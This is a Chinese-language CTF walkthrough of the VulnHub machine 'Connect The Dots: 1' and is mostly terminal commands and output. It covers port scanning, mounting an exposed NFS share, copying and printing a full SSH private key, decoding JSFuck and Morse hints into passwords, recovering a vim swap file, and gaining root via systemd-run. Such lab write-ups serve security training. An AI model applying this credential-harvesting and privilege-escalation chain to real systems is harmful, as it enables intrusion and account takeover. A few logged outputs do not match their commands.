CONNECT THE DOTS: 1
https://www.vulnhub.com/entry/connect-the-dots-1,384/
主机发现
# yunki @ yunki in ~ [15:05:26]
$ nmap -sn 192.168.54.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:05 CST
Nmap scan report for 192.168.54.2
Host is up (0.0011s latency).
Nmap scan report for 192.168.54.6
Host is up (0.0015s latency).
Nmap scan report for 192.168.54.128
Host is up (0.00084s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.61 seconds
nmap 扫描
# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:13:26]
$ sudo nmap --min-rate 10000 -p- 192.168.54.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 16:14 CST
Nmap scan report for 192.168.54.6
Host is up (0.00011s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
7822/tcp open unknown
33715/tcp open unknown
40457/tcp open unknown
43055/tcp open unknown
47205/tcp open unknown
MAC Address: 00:0C:29:68:65:C7 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds
# yunki @ yunki in ~ [15:05:42]
$ sudo nmap -sT -sV -sC -O -p22,80,111,2049,7822,36027,42525,59157,59649 192.168.54.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:06 CST
Nmap scan report for 192.168.54.6
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Landing Page
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 34251/tcp6 mountd
| 100005 1,2,3 36027/tcp mountd
| 100005 1,2,3 36225/udp mountd
| 100005 1,2,3 44552/udp6 mountd
| 100021 1,3,4 42525/tcp nlockmgr
| 100021 1,3,4 42593/tcp6 nlockmgr
| 100021 1,3,4 44959/udp6 nlockmgr
| 100021 1,3,4 57001/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
7822/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 384fe876b4b704650976dd234eb569ed (RSA)
| 256 acd2a60f4b4177df06f011d592399feb (ECDSA)
|_ 256 93f7786fcce8d48d754bc2bc134bf0dd (ED25519)
36027/tcp open mountd 1-3 (RPC #100005)
42525/tcp open nlockmgr 1-4 (RPC #100021)
59157/tcp open mountd 1-3 (RPC #100005)
59649/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:68:65:C7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds
# yunki @ yunki in ~ [15:06:31]
$ sudo nmap -sU -p22,80,111,2049,7822,36027,42525,59157,59649 192.168.54.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:06 CST
Nmap scan report for 192.168.54.6
Host is up (0.00025s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
111/udp open rpcbind
2049/udp open nfs
7822/udp closed unknown
36027/udp closed unknown
42525/udp closed unknown
59157/udp closed unknown
59649/udp closed unknown
MAC Address: 00:0C:29:68:65:C7 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.36 seconds
# yunki @ yunki in ~ [15:06:59]
$ sudo nmap -sC -p22,80,111,2049,7822,36027,42525,59157,59649 192.168.54.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:07 CST
Nmap scan report for 192.168.54.6
Host is up (0.00042s latency).
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
|_http-title: Landing Page
111/tcp open rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 34251/tcp6 mountd
| 100005 1,2,3 36027/tcp mountd
| 100005 1,2,3 36225/udp mountd
| 100005 1,2,3 44552/udp6 mountd
| 100021 1,3,4 42525/tcp nlockmgr
| 100021 1,3,4 42593/tcp6 nlockmgr
| 100021 1,3,4 44959/udp6 nlockmgr
| 100021 1,3,4 57001/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl
7822/tcp open unknown
36027/tcp open mountd
42525/tcp open nlockmgr
59157/tcp open unknown
59649/tcp open unknown
MAC Address: 00:0C:29:68:65:C7 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
# yunki @ yunki in ~ [15:07:17]
$ sudo nmap --script=vuln -p22,80,111,2049,7822,36027,42525,59157,59649 192.168.54.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:07 CST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.54.6
Host is up (0.00030s latency).
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_ /manual/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.54.6:80/mysite/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=D%3BO%3DD%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=S%3BO%3DD%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=M%3BO%3DD%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|_ http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
111/tcp open rpcbind
2049/tcp open nfs
7822/tcp open unknown
36027/tcp open unknown
42525/tcp open unknown
59157/tcp open unknown
59649/tcp open unknown
MAC Address: 00:0C:29:68:65:C7 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 55.96 seconds
21 ftp
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:12:42]
$ ftp 192.168.54.6
Connected to 192.168.54.6.
220 Welcome to Heaven!
Name (192.168.54.6:yunki): anonymous
530 Permission denied.
Login failed.
2049 nfs
ki @ yunki in ~/vulnhub/ConnectTheDots [15:30:24]
$ showmount -e 192.168.54.6
Export list for 192.168.54.6:
/home/morris *
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:30:27]
$ mkdir mo
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:30:30]
$ sudo mount -t nfs 192.168.54.6:/home/morris mo
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:30:58]
$ ls mo
Templates
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:31:00]
$ ls -liah mo/Templates
总计 8.0K
179081 drwxr-xr-x 2 yunki yunki 4.0K 2019年10月11日 .
131648 drwxr-xr-x 8 yunki yunki 4.0K 2019年10月11日 ..
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:31:09]
$ ls -liah mo
总计 56K
131648 drwxr-xr-x 8 yunki yunki 4.0K 2019年10月11日 .
1312116 drwxr-xr-x 3 yunki yunki 4.0K 3月29日 15:30 ..
179003 -rw------- 1 yunki yunki 1 2019年10月11日 .bash_history
134179 -rw-r--r-- 1 yunki yunki 220 2019年10月11日 .bash_logout
134178 -rw-r--r-- 1 yunki yunki 3.5K 2019年10月11日 .bashrc
179000 drwx------ 9 yunki yunki 4.0K 2019年10月11日 .cache
179011 drwx------ 10 yunki yunki 4.0K 2019年10月11日 .config
178998 drwx------ 3 yunki yunki 4.0K 2019年10月11日 .gnupg
179012 -rw------- 1 yunki yunki 1.9K 2019年10月11日 .ICEauthority
179032 drwx------ 3 yunki yunki 4.0K 2019年10月11日 .local
134182 -rw-r--r-- 1 yunki yunki 807 2019年10月11日 .profile
179139 drwx------ 2 yunki yunki 4.0K 2019年10月11日 .ssh
179081 drwxr-xr-x 2 yunki yunki 4.0K 2019年10月11日 Templates
179097 -rw------- 1 yunki yunki 52 2019年10月11日 .Xauthority
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:31:56]
$ cd mo
# yunki @ yunki in ~/vulnhub/ConnectTheDots/mo [15:32:16]
$ ls -liah
总计 56K
131648 drwxr-xr-x 8 yunki yunki 4.0K 2019年10月11日 .
1312116 drwxr-xr-x 3 yunki yunki 4.0K 3月29日 15:30 ..
179003 -rw------- 1 yunki yunki 1 2019年10月11日 .bash_history
134179 -rw-r--r-- 1 yunki yunki 220 2019年10月11日 .bash_logout
134178 -rw-r--r-- 1 yunki yunki 3.5K 2019年10月11日 .bashrc
179000 drwx------ 9 yunki yunki 4.0K 2019年10月11日 .cache
179011 drwx------ 10 yunki yunki 4.0K 2019年10月11日 .config
178998 drwx------ 3 yunki yunki 4.0K 2019年10月11日 .gnupg
179012 -rw------- 1 yunki yunki 1.9K 2019年10月11日 .ICEauthority
179032 drwx------ 3 yunki yunki 4.0K 2019年10月11日 .local
134182 -rw-r--r-- 1 yunki yunki 807 2019年10月11日 .profile
179139 drwx------ 2 yunki yunki 4.0K 2019年10月11日 .ssh
179081 drwxr-xr-x 2 yunki yunki 4.0K 2019年10月11日 Templates
179097 -rw------- 1 yunki yunki 52 2019年10月11日 .Xauthority
通过翻阅文件夹内其他文件,只找到2个有用的文件,将他们拷贝到主目录下进行处理。
# yunki @ yunki in ~/vulnhub/ConnectTheDots/mo [15:32:34]
$ cp .ssh/id_rsa ../
# yunki @ yunki in ~/vulnhub/ConnectTheDots/mo [15:33:27]
$ cp .ssh/id_rsa.pub ../
# yunki @ yunki in ~/vulnhub/ConnectTheDots/mo [15:33:36]
$ cd ..
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:55:11]
$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEArk8CQ4/wfxbRkZExIsKaKudv417Wngdv0ePocrwKOhblnhr5fnb5
IAZAOXS+uO1CV8eg1E4fsZGUmr/QSjnkqWdqnFD/JTH/h/Y+SwobvxOQe3WRFAyQJvEM8C
SSCAxoVaKnclVS+JFPLzs3YCx48Y/VUbKByArrpuv0hw3UxlHEFdXxYGJWa6zXFXlmbRLn
Tej1xfCa45hnC5YlSka57bnAnv6rk+xzBznLJ2Q2srpnyivz/6fNuWb5x7Rz2s4IeNUpi2
4JbTs/ldTQWKxjT8K62YGcNpSrg1RMVvrUcuUK/bfdikuyRBNuturzXBvQ0aTQ7fYkTFgH
6Bn5aCfTXwAAA8gsPQrlLD0K5QAAAAdzc2gtcnNhAAABAQCuTwJDj/B/FtGRkTEiwpoq52
/jXtaeB2/R4+hyvAo6FuWeGvl+dvkgBkA5dL647UJXx6DUTh+xkZSav9BKOeSpZ2qcUP8l
Mf+H9j5LChu/E5B7dZEUDJAm8QzwJJIIDGhVoqdyVVL4kU8vOzdgLHjxj9VRsoHICuum6/
SHDdTGUcQV1fFgYlZrrNcVeWZtEudN6PXF8JrjmGcLliVKRrntucCe/quT7HMHOcsnZDay
umfKK/P/p825ZvnHtHPazgh41SmLbgltOz+V1NBYrGNPwrrZgZw2lKuDVExW+tRy5Qr9t9
2KS7JEE2626vNcG9DRpNDt9iRMWAfoGfloJ9NfAAAAAwEAAQAAAQB51d/POZzwOBLjnIir
sznvIzWhx3hbnPcbziF7kNPVJov4pwIc0yvupm/duSxWNgBZOr+/pZuhkhA82jXMrAqYHi
D2gebVKM1jS0rfSIF8XUBwCw0M5nsbvQE+GVG5LnL+6GICGIGWHHssmEdsgalHrzF7mTn9
iSSN1/9jJtfChdxnHYSOa6hbmjXOkQ3rCJ6xJCYOQ7Oh/KsGbOqzErKAFpv22MD1OQ9xM3
Q+bm7QeHRMyXeM03z4yhty2VnrqcJGWFzUCtod3YigXITC18XfFmJ4sy4IFvYdJ/3lD7El
1hNisOWmSs5M/FXXZXS8u+ISXaKeTbN1l7PhC9S8wSaBAAAAgF7o7I23cGWx5zBYcxTjJv
SOOkgolM/Ki9/fM/MDAcOGeN2MbY+bgyxVWLSWLPx7ZqhS3+eyCV5aerHkC7jPZfTxNjcW
hJuJ4HSEu+BsXGCOutZUCeG9C4tAlWgIKttoc9jW7sgnfus7a0bUZxhmDNWGwf/KcChh5l
p57d8SFJb/AAAAgQDjAiuzQ6hmjVuJ/lTtDQRJDQM24qutH1K93cIoit3oDyotQukaVL8A
T9Lv+bVEAWM2qClga2+I/MxFtepZi/vdHtZR7afhD8qWUDEm32wnUeBDch0KOKjojjhBEw
Ay0LCibdgQpYtR0fAVsWaJXJmgkb7wL7KMd+tLld2e3cDdXQAAAIEAxJHdrnE5UWGoBwcw
HjEqjR7QVbhiVhWM2m4p6RN5xx+x2CKnATUyQCN9iZ6w7jpgMkQXHjqm6V+pKkudgHuwBh
BvfVNWIPvu4Z3GgYIIeqJuqcAm7K/VD0vatUNd2WYTin3JwdrpwEHLKsWzM1oscc1Ec/If
uiW7R6xHrWHGK+sAAAANbW9ycmlzQHNpcnJvbQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:55:13]
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuTwJDj/B/FtGRkTEiwpoq52/jXtaeB2/R4+hyvAo6FuWeGvl+dvkgBkA5dL647UJXx6DUTh+xkZSav9BKOeSpZ2qcUP8lMf+H9j5LChu/E5B7dZEUDJAm8QzwJJIIDGhVoqdyVVL4kU8vOzdgLHjxj9VRsoHICuum6/SHDdTGUcQV1fFgYlZrrNcVeWZtEudN6PXF8JrjmGcLliVKRrntucCe/quT7HMHOcsnZDayumfKK/P/p825ZvnHtHPazgh41SmLbgltOz+V1NBYrGNPwrrZgZw2lKuDVExW+tRy5Qr9t92KS7JEE2626vNcG9DRpNDt9iRMWAfoGfloJ9Nf morris@sirrom
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:55:57]
$ ssh -i id_rsa morris@192.168.54.6
ssh: connect to host 192.168.54.6 port 22: Connection refused
失败了(!!!)重新查看nmap结果,发现ssh端口是7822 这里重新登录。
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:55:57]
$ ssh -i id_rsa morris@192.168.54.6 -p 7822
ssh: connect to host 192.168.54.6 port 22: Connection refused
还是失败了 可恶!
80 http
目录爆破
# yunki @ yunki in ~ [15:08:33]
$ gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.54.6 -x php,txt,rar,zip,html --no-error
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.6
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: zip,html,php,txt,rar
[+] Timeout: 10s
===============================================================
2023/03/29 15:12:23 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 292]
/images (Status: 301) [Size: 313] [--> http://192.168.54.6/images/]
/index.html (Status: 200) [Size: 1964]
/manual (Status: 301) [Size: 313] [--> http://192.168.54.6/manual/]
/javascript (Status: 301) [Size: 317] [--> http://192.168.54.6/javascript/]
/hits.txt (Status: 200) [Size: 44]
/backups (Status: 200) [Size: 6301]
/backups.html (Status: 200) [Size: 325]
/mysite (Status: 301) [Size: 313] [--> http://192.168.54.6/mysite/]
/.html (Status: 403) [Size: 292]
/server-status (Status: 403) [Size: 300]
Progress: 1320488 / 1323366 (99.78%)
===============================================================
2023/03/29 15:16:51 Finished
===============================================================
在mysite页面发现一个诡异的cs文件而不是css文件,这里打开,发现是jsfuck。
jsfuck
这里将文件处理一下,去掉其他字符只留下需要的6个字符,放到www.jsfuck.com下,点击run this.
You’re smart enough to understand me. Here’s your secret, TryToGuessThisNorris@2k19
根据提示,使用norris用户,密码使用TryToGuessThisNorris@2k19,尝试7822端口ssh登录。
成功!
获得初始shell
# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:12:07] C:130
$ ssh norris@192.168.54.6 -p 7822
norris@192.168.54.6's password:
Linux sirrom 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
###
# # # # ##### # ## ##### # # # ####
# ## # # # # # # # # ## # # #
# # # # # # # # # # # # # # #
# # # # # # # ###### # # # # # # ###
# # ## # # # # # # # # ## # #
### # # # # # # # # # # # ####
Last login: Wed Mar 29 13:41:12 2023 from 192.168.54.128
norris@sirrom:~$ whoami
norris
norris@sirrom:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:68:65:c7 brd ff:ff:ff:ff:ff:ff
inet 192.168.54.6/24 brd 192.168.54.255 scope global dynamic noprefixroute ens33
valid_lft 1502sec preferred_lft 1502sec
inet6 fe80::20c:29ff:fe68:65c7/64 scope link noprefixroute
valid_lft forever preferred_lft forever
norris@sirrom:~$ ls
ftp user.txt
norris@sirrom:~$ ls
ftp user.txt
norris@sirrom:~$ ls -liah ftp
total 12K
131105 dr-xr-xr-x 3 nobody nogroup 4.0K Oct 11 2019 .
131091 drwxr-xr-x 5 norris norris 4.0K Mar 29 13:41 ..
179189 drwxr-xr-x 2 norris norris 4.0K Oct 11 2019 files
norris@sirrom:~$ ls -liah ftp/files
total 972K
179189 drwxr-xr-x 2 norris norris 4.0K Oct 11 2019 .
131105 dr-xr-xr-x 3 nobody nogroup 4.0K Oct 11 2019 ..
179199 -r-------- 1 norris norris 6.2K Oct 11 2019 backups.bak
179297 -r-------- 1 norris norris 39K Oct 11 2019 game.jpg.bak
179310 -r-------- 1 norris norris 29 Oct 11 2019 hits.txt.bak
179311 -r-------- 1 norris norris 911K Oct 11 2019 m.gif.bak
norris@sirrom:~$ strings backups.bak
-bash: strings: command not found
这里发现了ftp,但是无法查看内容,于是使用norris凭据,登录ftp查看内容。
21 ftp再探索
# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:22:03]
$ ftp 192.168.54.6
Connected to 192.168.54.6.
220 Welcome to Heaven!
Name (192.168.54.6:yunki): norris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 Oct 11 2019 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> prompt
Interactive mode off.
ftp> mget *.*
local: backups.bak remote: backups.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backups.bak (6301 bytes).
226 Transfer complete.
6301 bytes received in 0.00 secs (66.0341 MB/s)
local: game.jpg.bak remote: game.jpg.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.jpg.bak (39610 bytes).
226 Transfer complete.
39610 bytes received in 0.00 secs (32.9625 MB/s)
local: hits.txt.bak remote: hits.txt.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for hits.txt.bak (29 bytes).
226 Transfer complete.
29 bytes received in 0.00 secs (93.1589 kB/s)
local: m.gif.bak remote: m.gif.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for m.gif.bak (932659 bytes).
226 Transfer complete.
932659 bytes received in 0.01 secs (118.4358 MB/s)
ftp>quit
# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:25:17]
$ file *.bak
backups.bak: ISO Media
game.jpg.bak: JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left], comment: ".... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ", progressive, precision 8, 712x350, components 3
hits.txt.bak: ASCII text, with no line terminators
m.gif.bak: GIF image data, version 89a, 245 x 245
这里可以发现game.jpg.bak发现了一个comment,这里有个摩斯密码,使用strings获取完整的morse code,然后去cyberchef去解密。
HEY NORRIS, YOU'VE MADE THIS FAR. FAR FAR FROM HEAVEN WANNA SEE HELL NOW? HAHA YOU SURELY MISSED ME, DIDN'T YOU? OH DAMN MY BATTERY IS ABOUT TO DIE AND I AM UNABLE TO FIND MY CHARGER SO QUICKLY LEAVING A HINT IN HERE BEFORE THIS SYSTEM SHUTS DOWN AUTOMATICALLY. I AM SAVING THE GATEWAY TO MY DUNGEON IN A 'SECRETFILE' WHICH IS PUBLICLY ACCESSIBLE.
提示SECRETFILE?还可以公开访问。
那就去搜索一下secretfile
norris@sirrom:~$ find / -iname "secretfile" -type f 2>/dev/null # -iname 忽略大小写
/var/www/html/secretfile
norris@sirrom:~$ cat /var/www/html/secretfile
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference.
Mentioning below for reference.(仅供参考) 后面居然没有了?参考什么呢?目录下还发现了一个.secretfile.swp,没有访问权限,会不会是他在捣鬼?这是web目录,所以可以使用wget下载下来看看。
这里思考一下,什么情况下会出现swp文件。
# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:33:46]
$ wget http://192.168.54.6/.secretfile.swp
--2023-03-29 16:39:26-- http://192.168.54.6/.secretfile.swp
正在连接 192.168.54.6:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:12288 (12K)
正在保存至: “.secretfile.swp”
.secretfile.swp 100%[=========================================================================>] 12.00K --.-KB/s 用时 0s
2023-03-29 16:39:26 (288 MB/s) - 已保存 “.secretfile.swp” [12288/12288])
# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:39:26]
$ cat .secretfile.swp
b0VIM 8.1�
U3210#"! Utpadc����blehguessme090 I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference..%
# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:39:31]
$ strings .secretfile.swp
b0VIM 8.1
root
sirrom
/var/www/html/secretfile
U3210
#"!
blehguessme090
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference..
上面说明了原因。那会不会就是修改这个文件过程中BATTERY IS DIE?通过strings 看到了vim的字样和一些与secretfile内容不同的信息。这里使用vim打开文件。vim -r 恢复swp文件。
发现了仅供参考的blehguessme090。会不会是管理员Morris的密码?尝试!
获得Morris权限
norris@sirrom:/var/www/html$ su morris
Password:
morris@sirrom:/var/www/html$ whoami
morris
morris@sirrom:/var/www/html$ sudo -l
[sudo] password for morris:
Sorry, user morris may not run sudo on sirrom.
提权
morris@sirrom:~$ whoami
morris
morris@sirrom:~$ id
uid=1000(morris) gid=1000(morris) groups=1000(morris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),117(lpadmin),118(scanner)
morris@sirrom:~$ sudo -l
[sudo] password for morris:
Sorry, user morris may not run sudo on sirrom.
morris@sirrom:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
morris@sirrom:~$ /sbin/getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/ping = cap_net_raw+ep
使用systemd-run -t 提权
norris@sirrom:/$ systemd-run -t /bin/bash
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
Authentication is required to manage system services or other units.
Authenticating as: norris,,, (norris)
Password:
==== AUTHENTICATION COMPLETE ===
Running as unit: run-u156.service
Press ^] three times within 1s to disconnect TTY.
root@sirrom:/# whoami
root
root@sirrom:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
